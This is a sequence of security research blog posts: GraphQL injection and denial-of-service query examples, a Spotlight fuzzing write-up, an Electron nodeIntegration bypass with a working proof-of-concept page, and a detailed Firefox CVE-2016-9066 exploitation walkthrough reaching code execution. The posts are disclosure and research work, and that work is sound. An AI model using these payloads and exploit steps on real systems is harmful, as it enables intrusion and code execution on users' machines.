mutation search($filters: Filters!){
	authors(filter: $filters)
	viewer{
		id
		email
		firstName
		lastName
	} 
}

{
	"filters":{
		"username":"paolo' or 1=1--"
		"minstories":0
	}
}

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {
 stories{
  title
  body
  comments{
   comment
   author{
    comments{
     author{
      comments{
       comment
       author{
        comments{
         comment
         author{
          comments{
           comment
           author{
            name
           }
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
}

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.

Keep in mind that in the PHP GraphQL implementation:

  • Complexity analysis is disabled by default

  • Limiting Query Depth is disabled by default

  • Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing the meta fields __type and __schema

Outro

GraphQL is an interesting new technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilities like Broken Access Controls, Insecure Direct Object References, Cross-Site Scripting (XSS) and classic injection bugs. As with any technology, GraphQL-based applications may be prone to implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”

@voidsec


We're hiring - Join Doyensec!

26 November 2017 at 23:00

At Doyensec, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background and certifications. If you are really good and passionate at building and breaking complex software, you’re the right candidate.

Open Positions

:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-month collaboration, combined with an additional bonus upon successful completion of the project.

Responsibilities:

  • Full-stack development (front-end, back-end components) of web security testing tools
  • Solve technical challenges at the edge of web security R&D, together with Doyensec’s founders

Requirements:

  • Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
  • Ability to work with standard dev tools and techniques (IDE, git, …)
  • You’re passionate about building great software and can have fun while doing it
  • Interested in web security, with good understanding of common software vulnerabilities
  • You’re self-driven and can focus on a project to make it happen
  • Eager to learn, adapt and perfect your work

Contact us at [email protected]

:: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at “crawling around in the ventilation ducts of the world’s most popular and important applications”, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of your time exclusively in research, where we build security testing tools, discover new attack techniques, and develop countermeasures.

Responsibilities:

  • Security testing of web, mobile (iOS, Android) applications
  • Vulnerability research activities, coordinated and executed with Doyensec’s founders
  • Partner with customers to ensure project’s objectives are achieved 

Requirements:

  • Ability to discover, document and fix security bugs
  • You’re passionate about understanding complex systems and can have fun while doing it
  • Top-notch in web security. Show us public research, code, advisories, etc.
  • Eager to learn, adapt, and perfect your work

Contact us at [email protected]

Staring into the Spotlight

14 November 2017 at 23:00

Spotlight is the all pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works.

One day, we found some interesting looking crashes recorded in /Users/<name>/Library/Logs/DiagnosticReports

Yet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.

fsevents

The Spotlight system is overseen by mds. It opens and reads from /dev/fsevents, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes, with which it communicates through Mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block, and the volume of events streaming through the fsevents device can be quite large. Mds will spawn more mdworker processes when handling a higher volume of events, but there is no guarantee it can see and capture every single event.

The kernel filters which root-level processes can read from this device.

fsevents filter

Each of the mdworker processes gets spawned, parses some files, writes the meta info, and dies. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker.

Importers

You can see what mdworkers are up to with the following: sudo fs_usage -w -f filesys mdworker

Importers are found in /Library/Spotlight, /System/Library/Spotlight, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post install script with mdimport -r <importer> and/or lsregister. The following command shows the list of importers present on my laptop. It shows some third party apps have installed their own importers.

$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/iBooksAuthor.mdimporter",
    "/Library/Spotlight/iWork.mdimporter",
    "/Library/Spotlight/Microsoft Office.mdimporter",
    "/System/Library/Spotlight/Application.mdimporter",
...
    "/System/Library/Spotlight/SystemPrefs.mdimporter",
    "/System/Library/Spotlight/vCard.mdimporter",
    "/Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter",
    "/Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter",
    "/Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter",
    "/Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter",
    "/Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter"
)

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - mdimport <file>. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at the official Apple developer documentation.

Crash File

crash logging

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437

The 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to look up the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory /.vol/<Volume ID>/<File iNode>. You can see this info with the stat syscall on a file.

$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc

$ ls /.vol/16777220/418395
afpovertcp.cfg    fstab.hd            networks          protocols
aliases           ftpd.conf           newsyslog.conf    racoon
aliases.db        ftpd.conf.default   newsyslog.d       rc.common

The UTI registered by the importer is also shown “com.apple.truetype-datafork-suitcase-font”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the /System/Library/Spotlight/Font.mdimporter importer.

crash logging

The screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug.

The rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward; crashes and signals are easily caught.

The various importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language, and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences->Spotlight->Privacy. You can’t fuzz mdimport from this folder; instead, disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder.

@day6reak

Modern Alchemy: Turning XSS into RCE

2 August 2017 at 22:00

TL;DR

At the recent Black Hat Briefings 2017, Doyensec’s co-founder Luca Carettoni presented a new research on Electron security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise any Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

What’s Electron?

While you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. Slack, Atom, Visual Studio Code, WordPress Desktop, GitHub Desktop, Basecamp3 and Mattermost are just a few examples of applications built using this framework. Any time a traditional web application is ported to desktop, it is likely that the developers used Electron.

Electron Motto

Understanding the nodeIntegration flag

While Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.

It is well understood that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:

BrowserWindow

mainWindow = new BrowserWindow({  
	"webPreferences": { 
		"nodeIntegration" : false,  
		"nodeIntegrationInWorker" : false 
	}
});

mainWindow.loadURL('https://www.doyensec.com/');

WebView

<webview src="https://www.doyensec.com/"></webview>

In the above examples, the nodeIntegration flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process.

Hunting for nodeIntegration bypasses

It should now be clear why nodeIntegration is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaw to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the official documentation, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs.

When a new window is created, Electron returns an instance of BrowserWindowProxy. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

SOP Bypass #1

<script>
const win = window.open("https://www.doyensec.com"); 
win.location = "javascript:alert(document.domain)"; 
</script> 

SOP Bypass #2

<script>
const win = window.open("https://www.doyensec.com"); 
win.eval("alert(document.domain)");
</script>

The eval mechanism used by the SOP Bypass #2 can be explained with the following diagram:

BrowserWindowProxy's Eval

Additional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP-bypass by design with a specific privileged url defined in lib/renderer/init.js, we realized that we could override the nodeIntegration setting.

Chrome DevTools in Electron, prior to 1.6.8

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:

<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
  	<script>
    	document.write("Current location:" + window.location.href + "<br>");

    	const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
    	win.eval("const {shell} = require('electron'); 
    	shell.openExternal('file:///Applications/Calculator.app');");
       </script>
  </body>
</html>

On May 10, 2017, we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix, since the privileged chrome-devtools:// URL had been discovered during an internal security activity just a few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the git commit that fixes the privileged URL is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron and consequently all Electron-based apps were affected. Mitre assigned CVE-2017-12581 for this issue.

Mitigating nodeIntegration bypass vulnerabilities

  • Keep your application in sync with the latest Electron framework release. When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

  • Adopt secure coding practices. The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron, hence it is highly recommended to adopt secure software development best practices and perform periodic security testing.

  • Know your framework (and its limitations). Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our Electronegativity, A study of Electron Security presentation and Electron Security Checklist white-paper.

  • Use the recent “sandbox” experimental feature. Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable sandboxing which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the <webview> tag, etc.) this option should be enabled to provide additional isolation.

XSSGame by Google at #HITB2017AMS – Writeup

26 April 2017 at 10:19
CTF’s homepage

During the last edition of HITB in Amsterdam we participated in the XSSGame by Google: 8 XSS challenges to win a Nexus 5X. The various levels exposed common vulnerabilities present in modern web apps.

Introduction

Each level required triggering JavaScript’s alert function by crafting a URL with a Cross-Site Scripting (XSS) payload inside, which had to be executed without any user interaction: once it is executed, the server replies with the link to the following challenge.

Exploiting a Cross-mmap Overflow in Firefox

10 March 2017 at 00:00

This post will explore how CVE-2016-9066, a simple but quite interesting (from an exploitation perspective) vulnerability in Firefox, can be exploited to gain code execution.

tl;dr an integer overflow in the code responsible for loading script tags leads to an out-of-bounds write past the end of an mmap chunk. One way to exploit this includes placing a JavaScript heap behind the buffer and subsequently overflowing into its meta data to create a fake free cell. It is then possible to place an ArrayBuffer instance inside another ArrayBuffer’s inline data. The inner ArrayBuffer can then be arbitrarily modified, yielding an arbitrary read/write primitive. From there it is quite easy to achieve code execution. The full exploit can be found here and was tested against Firefox 48.0.1 on macOS 10.11.6. The bugzilla report can be found here.

The Vulnerability

The following code is used for loading the data for (external) script tags:

nsresult
nsScriptLoadHandler::TryDecodeRawData(const uint8_t* aData,
                                      uint32_t aDataLength,
                                      bool aEndOfStream)
{
  int32_t srcLen = aDataLength;
  const char* src = reinterpret_cast<const char *>(aData);
  int32_t dstLen;
  nsresult rv =
    mDecoder->GetMaxLength(src, srcLen, &dstLen);

  NS_ENSURE_SUCCESS(rv, rv);

  uint32_t haveRead = mBuffer.length();
  uint32_t capacity = haveRead + dstLen;
  if (!mBuffer.reserve(capacity)) {
    return NS_ERROR_OUT_OF_MEMORY;
  }

  rv = mDecoder->Convert(src,
                         &srcLen,
                         mBuffer.begin() + haveRead,
                         &dstLen);

  NS_ENSURE_SUCCESS(rv, rv);

  haveRead += dstLen;
  MOZ_ASSERT(haveRead <= capacity, "mDecoder produced more data than expected");
  MOZ_ALWAYS_TRUE(mBuffer.resizeUninitialized(haveRead));

  return NS_OK;
}

The code will be invoked by OnIncrementalData whenever new data has arrived from the server. The bug is a simple integer overflow, happening when the server sends more than 4GB of data. In that case, capacity will wrap around and the following call to mBuffer.reserve will not modify the buffer in any way. mDecoder->Convert then writes data past the end of an 8GB buffer (data is stored as char16_t in the browser), which will be backed by an mmap chunk (a common practice for very large chunks).

The patch is also similarly simple:

   uint32_t haveRead = mBuffer.length();
-  uint32_t capacity = haveRead + dstLen;
-  if (!mBuffer.reserve(capacity)) {
+
+  CheckedInt<uint32_t> capacity = haveRead;
+  capacity += dstLen;
+
+  if (!capacity.isValid() || !mBuffer.reserve(capacity.value())) {
     return NS_ERROR_OUT_OF_MEMORY;
   }

The bug doesn’t look too promising at first. For one, it requires sending and allocating multiple gigabytes of memory. As we will see however, the bug can be exploited fairly reliably and the exploit completes within about a minute after opening the page on my 2015 MacBook Pro. We will now first explore how this bug can be exploited to pop a calculator on macOS, then improve the exploit to be more reliable and use less bandwidth afterwards (spoiler: we will use HTTP compression).

Exploitation

Since the overflow happens past the end of an mmap region, our first concern is whether it is possible to reliably allocate something behind the overflown buffer. In contrast to some heap allocators, mmap (which can be thought of as a memory allocator provided by the kernel) is very deterministic: calling mmap twice will result in two consecutive mappings if there are no existing holes that could satisfy either of the two requests. You can try this for yourself using the following piece of code. Note that the result will be different depending on whether the code is run on Linux or macOS. The mmap region grows towards lower addresses on Linux while it grows towards higher ones on macOS. For the rest of this post we will focus on macOS. A similar exploit should be possible on Linux and Windows though.

#include <sys/mman.h>
#include <stdio.h>

const size_t MAP_SIZE = 0x100000;       // 1 MB

int main()
{
    char* chunk1 = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    char* chunk2 = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    printf("chunk1: %p - %p\n", chunk1, chunk1 + MAP_SIZE);
    printf("chunk2: %p - %p\n", chunk2, chunk2 + MAP_SIZE);

    return 0;
}

The output of the above program tells us that we should be able to allocate something behind the overflowing buffer by simply mmap’ing memory until all existing holes are filled, then allocating one more memory chunk through mmap. To verify this we will do the following:

  1. Load an HTML document which includes a script (payload.js, which will trigger the overflow) and asynchronously executes some JavaScript code (code.js, which implements steps 3 and 5)

  2. When the browser requests payload.js, have the server reply with a Content-Length of 0x100000001 but only send the first 0xffffffff bytes of the data

  3. Afterwards, let the JavaScript code allocate multiple large (1GB) ArrayBuffers (memory won’t necessarily be used until the buffers are actually written to)

  4. Have the webserver send the remaining two bytes of payload.js

  5. Check the first few bytes of every ArrayBuffer, one should contain the data sent by the webserver

To implement this, we will need some kind of synchronization primitive between the JavaScript code running in the browser and the webserver. For that reason I wrote a tiny webserver on top of Python’s asyncio library, which contains a handy Event object for synchronization across coroutines. Creating two global events makes it possible to signal the server that the client-side code has finished its current task and is now waiting for the server to perform the next step. The handler for /sync looks as follows:

async def sync(request, response):
    script_ready_event.set()
    await server_done_event.wait()
    server_done_event.clear()

    response.send_header(200, {
        'Content-Type': 'text/plain; charset=utf-8',
        'Content-Length': '2'
    })

    response.write(b'OK')
    await response.drain()

On the client side, I used synchronous XMLHttpRequests to block script execution until the server has finished its part:

function synchronize() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', location.origin + '/sync', false);
    // Server will block until the event has been fired
    xhr.send();
}

With that we can implement the above scenario and we will see that indeed one of the ArrayBuffer objects now contains our payload byte at the start of its buffer. There is one small limitation though: we can only overflow with valid UTF-16, as that is what Firefox uses internally. We’ll have to keep this in mind. What remains now is to find something more interesting to allocate instead of the ArrayBuffer that was overflown into.

Hunting for Target Objects

Since malloc (and thus the new operator in C++) will at some point request more memory using mmap, anything allocated with those could potentially be of interest for our exploit. I went a different route though. I initially wanted to check whether it would be possible to overflow into JavaScript objects and for example corrupt the length of an array or something similar. I thus started to dig around the JavaScript allocators to see where JSObjects are stored. Spidermonkey (the JavaScript engine inside Firefox) stores JSObjects in two separate regions:

  1. The tenured heap. Longer lived objects as well as a few selected object types are allocated here. This is a fairly classical heap that keeps track of free spots which it then reuses for future allocations.

  2. The Nursery. This is a memory region that contains short-lived objects. Most JSObjects are first allocated here, then moved into the tenured heap if they are still alive during the next GC cycle (this includes updating all pointers to them and thus requires that the garbage collector knows about all pointers to its objects). The nursery requires no free list or similar: after a GC cycle the nursery is simply declared free since all alive objects have been moved out of it.

For a more in depth discussion of Spidermonkey internals see this phrack article.

Objects in the tenured heap are stored in containers called Arenas:

/*
 * Arenas are the allocation units of the tenured heap in the GC. An arena
 * is 4kiB in size and 4kiB-aligned. It starts with several header fields
 * followed by some bytes of padding. The remainder of the arena is filled
 * with GC things of a particular AllocKind. The padding ensures that the
 * GC thing array ends exactly at the end of the arena:
 *
 * <----------------------------------------------> = ArenaSize bytes
 * +---------------+---------+----+----+-----+----+
 * | header fields | padding | T0 | T1 | ... | Tn |
 * +---------------+---------+----+----+-----+----+
 * <-------------------------> = first thing offset
 */
class Arena
{
    static JS_FRIEND_DATA(const uint32_t) ThingSizes[];
    static JS_FRIEND_DATA(const uint32_t) FirstThingOffsets[];
    static JS_FRIEND_DATA(const uint32_t) ThingsPerArena[];

    /*
     * The first span of free things in the arena. Most of these spans are
     * stored as offsets in free regions of the data array, and most operations
     * on FreeSpans take an Arena pointer for safety. However, the FreeSpans
     * used for allocation are stored here, at the start of an Arena, and use
     * their own address to grab the next span within the same Arena.
     */
    FreeSpan firstFreeSpan;

    // ...

The comment already gives a fairly good summary: Arenas are simply container objects inside which JavaScript objects of the same size are allocated. They are located inside a container object, the Chunk structure, which is itself directly allocated through mmap. The interesting part is the firstFreeSpan member of the Arena class: it is the very first member of an Arena object (and thus lies at the beginning of an mmap-ed region), and essentially indicates the index of the first free cell inside this Arena. This is what a FreeSpan instance looks like:

class FreeSpan
{
    uint16_t first;
    uint16_t last;

    // methods following
}

Both first and last are byte indices into the Arena, indicating the head of the freelist. This opens up an interesting way to exploit this bug: by overflowing into the firstFreeSpan field of an Arena, we may be able to allocate an object inside another object, preferably inside some kind of accessible inline data. We would then be able to modify the “inner” object arbitrarily.

This technique has a few benefits:

  • Being able to allocate a JavaScript object at a chosen offset inside an Arena directly yields a memory read/write primitive as we shall see

  • We only need to overflow 4 bytes of the following chunk and thus won’t corrupt any pointers or other sensitive data

  • Arenas/Chunks can be allocated fairly reliably just by allocating large numbers of JavaScript objects

As it turns out, ArrayBuffer objects up to a size of 96 bytes will have their data stored inline after the object header. They will also skip the nursery and thus be located inside an Arena. This makes them ideal for our exploit. We will thus

  1. Allocate lots of ArrayBuffers with 96 bytes of storage

  2. Overflow and create a fake free cell inside the Arena following our buffer

  3. Allocate more ArrayBuffer objects of the same size and see if one of them is placed inside another ArrayBuffer’s data (just scan all “old” ArrayBuffers for non-zero content)

The Need for GC

Unfortunately, it’s not quite that easy: in order for Spidermonkey to allocate an object in our target (corrupted) Arena, the Arena must have previously been marked as (partially) free. This means that we need to free at least one slot in each Arena. We can do this by deleting every 25th ArrayBuffer (since there are 25 per Arena), then forcing garbage collection.

Spidermonkey triggers garbage collection for a variety of reasons. It seems the easiest one to trigger is TOO_MUCH_MALLOC: it is simply triggered whenever a certain number of bytes have been allocated through malloc. Thus, the following code suffices to trigger a garbage collection:

function gc() {
    const maxMallocBytes = 128 * MB;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

Afterwards, our target arena will be put onto the free list and our subsequent overwrite will corrupt it. The next allocation from the corrupted arena will then return a (fake) cell inside the inline data of an ArrayBuffer object.

(Optional Reading) Compacting GC

Actually, it’s a little bit more complicated. There exists a GC mode called compacting GC, which will move objects from multiple partially filled arenas to fill holes in other arenas. This reduces internal fragmentation and helps freeing up entire Chunks so they can be returned to the OS. For us however, a compacting GC would be troublesome since it might fill the hole we created in our target arena. The following code is used to determine whether a compacting GC should be run:

bool
GCRuntime::shouldCompact()
{
    // Compact on shrinking GC if enabled, but skip compacting in incremental
    // GCs if we are currently animating.
    return invocationKind == GC_SHRINK && isCompactingGCEnabled() &&
        (!isIncremental || rt->lastAnimationTime + PRMJ_USEC_PER_SEC < PRMJ_Now());
}

Looking at the code there should be ways to prevent a compacting GC from happening (e.g. by performing some animations). It seems we are lucky though: our gc function from above will trigger the following code path in Spidermonkey, thus preventing a compacting GC since the invocationKind will be GC_NORMAL instead of GC_SHRINK.

bool
GCRuntime::gcIfRequested()
{
    // This method returns whether a major GC was performed.

    if (minorGCRequested())
        minorGC(minorGCTriggerReason);

    if (majorGCRequested()) {
        if (!isIncrementalGCInProgress())
            startGC(GC_NORMAL, majorGCTriggerReason);       // <-- we trigger this code path
        else
            gcSlice(majorGCTriggerReason);
        return true;
    }

    return false;
}

Writing an Exploit

At this point we have all the pieces together and can actually write an exploit. Once we have created the fake free cell and allocated an ArrayBuffer inside of it, we will see that one of the previously allocated ArrayBuffers now contains data. An ArrayBuffer object in Spidermonkey looks roughly as follows:

// From JSObject
GCPtrObjectGroup group_;

// From ShapedObject
GCPtrShape shape_;

// From NativeObject
HeapSlots* slots_;
HeapSlots* elements_;

// Slot offsets from ArrayBufferObject
static const uint8_t DATA_SLOT = 0;
static const uint8_t BYTE_LENGTH_SLOT = 1;
static const uint8_t FIRST_VIEW_SLOT = 2;
static const uint8_t FLAGS_SLOT = 3;

The XXX_SLOT constants determine the offset of the corresponding value from the start of the object. As such, the data pointer (DATA_SLOT) will be stored at addrof(ArrayBuffer) + sizeof(ArrayBuffer).

We can now construct the following exploit primitives:

  • Reading from an absolute memory address: we set the DATA_SLOT to the desired address and read from the inner ArrayBuffer

  • Writing to an absolute memory address: same as above, but this time we write to the inner ArrayBuffer

  • Leaking the address of a JavaScript Object: for that, we set the Object whose address we want to know as property of the inner ArrayBuffer, then read the address from the slots_ pointer through our existing read primitive

Process Continuation

To avoid crashing the browser process during the next GC cycle, we have to repair a few things:

  • The ArrayBuffer following the outer ArrayBuffer in our exploit, as that one will have been corrupted by the inner ArrayBuffer’s data. To fix this, we can simply copy another ArrayBuffer object into that location

  • The Cell that was originally freed in our Arena now looks like a used Cell and will be treated as such by the collector, leading to a crash since it has been overwritten with other data (e.g. a FreeSpan instance). We can fix this by restoring the original firstFreeSpan field of our Arena to mark that Cell as free again.

This suffices to keep the browser alive after the exploit finishes.

Summary

Putting everything together, the following steps will award us with an arbitrary read/write primitive:

  1. Insert a script tag to load the payload and eventually trigger the bug.

  2. Wait for the server to send up to 2GB + 1 bytes of data. The browser will now have allocated the final chunk that we will later overflow from. We try to fill the existing mmap holes using ArrayBuffer objects like we did for the very first PoC.

  3. Allocate JavaScript Arenas (memory regions) containing ArrayBuffers of size 96 (largest size so the data is still allocated inline behind the object) and hope one of them is placed right after the buffer we are about to overflow. Mmap allocates contiguous regions, so this can only fail if we don’t allocate enough memory or if something else is allocated there.

  4. Have the server send everything up to 0xffffffff bytes in total, completely filling the current chunk

  5. Free one ArrayBuffer in every arena and try to trigger gargabe collection so the arenas are inserted into the free list.

  6. Have the server send the remaining data. This will trigger the overflow and corrupt the internal free list (indicating which cells are unused) of one of the arenas. The freelist is modified such that the first free cell lies within the inline data of one of the ArrayBuffers contained in the Arena.

  7. Allocate more ArrayBuffers. If everything worked so far, one of them will be allocated inside the inline data of another ArrayBuffer. Search for that ArrayBuffer.

  8. If found, construct an arbitrary memory read/write primitive. We can now modify the data pointer of the inner ArrayBuffer, so this is quite easy.

  9. Repair the corrupted objects to keep the process alive after our exploit is finished.

Popping calc

What remains now is to somehow pop a calculator.

A simple way to run custom code is to abuse the JIT region; however, this technique is (partially) mitigated in Firefox. This can be bypassed given our exploitation primitives (e.g. by writing a small ROP chain and transferring control there), but this seemed too complicated for a simple PoC.

There are other Firefox-specific techniques to obtain code execution by abusing privileged JavaScript, but these require non-trivial modifications to the browser state (e.g. adding the turn_off_all_security_so_that_viruses_can_take_over_this_computer preference).

I instead ended up using some standard CTF tricks to finish the exploit: looking for cross references to libc functions that accept a string as first argument (in this case strcmp), I found the implementation of Date.toLocaleFormat and noticed that it converts its first argument from a JSString to a C-string, which it then uses as first argument for strcmp. So we can simply replace the GOT entry for strcmp with the address of system and execute data_obj.toLocaleFormat("open -a /Applications/Calculator.app");. Done :)

Improving the Exploit

At this point the basic exploit is already finished. This section will now describe how to make it more reliable and less bandwidth hungry.

Adding Robustness

Up until now our exploit simply allocated a few very large ArrayBuffer instances (1GB each) to fill existing mmap holes, then allocated roughly another GB of js::Arena instances to overflow into. It thus assumed that the browser’s heap operations are more or less deterministic during exploitation. Since this isn’t necessarily the case, we’d like to make our exploit a little more robust.

A quick look at the implementation of the mozilla::Vector class (which is used to hold the script buffer) shows us that it uses realloc to double the size of its buffer when needed. Since jemalloc directly uses mmap for larger chunks, this leaves us with the following allocation pattern:

  • mmap 1MB
  • mmap 2MB, munmap previous chunk
  • mmap 4MB, munmap previous chunk
  • mmap 8MB, munmap previous chunk
  • mmap 8GB, munmap previous chunk

Because the current chunk size will always be larger than the sum of all previous chunk sizes, this will result in a lot of free space preceding our final buffer. In theory, we could simply calculate the total sum of the free space, then allocate a large ArrayBuffer afterwards. In practice, this doesn’t quite work since there will be other allocations after the server starts sending data and before the browser finishes decompressing the last chunk. Also, jemalloc holds back a part of the freed memory for later usage. Instead we’ll try to allocate a chunk as soon as it is freed by the browser. Here’s what we’ll do:

  1. JavaScript code waits for the server using sync

  2. The server sends all data up to the next power of two (in MB) and thus triggers exactly one call to realloc at the end. The browser will now free a chunk of a known size

  3. The server sets the server_done_event, causing the JavaScript code to continue

  4. JavaScript code allocates an ArrayBuffer instance of the same size as the previous buffer, filling the free space

  5. This is repeated until we have sent 0x80000001 bytes (thus forced the allocation of the final buffer)

This simple algorithm is implemented on the server side here and on the client in step 1. Using this algorithm, we can fairly reliably get an allocation behind our target buffer by spraying only a few megabytes of ArrayBuffer instances instead of multiple gigabytes.

Reducing Network Load

Our current exploit requires sending 4GB of data over the network. That’s easy to fix though: we’ll use HTTP compression. The nice part here is that e.g. zlib supports “streamed” compression, which makes it possible to incrementally compress the payload. With this we just have to add each part of the payload to the zlib stream, then call flush on it to obtain the next compressed chunk of the payload and send that to the client. The browser will uncompress this chunk upon receiving it and perform the desired action (e.g. perform one realloc step).

This is implemented in the construct_payload method in poc.py and manages to reduce the size of the payload to about 18MB.

About Resource Usage

At least in theory, the exploit requires quite a lot of memory:

  • an 8GB buffer holding our “JavaScript” payload. Actually, it’s more like 12 GB, since during the final realloc, the content of a 4GB buffer must be copied to a new 8GB buffer

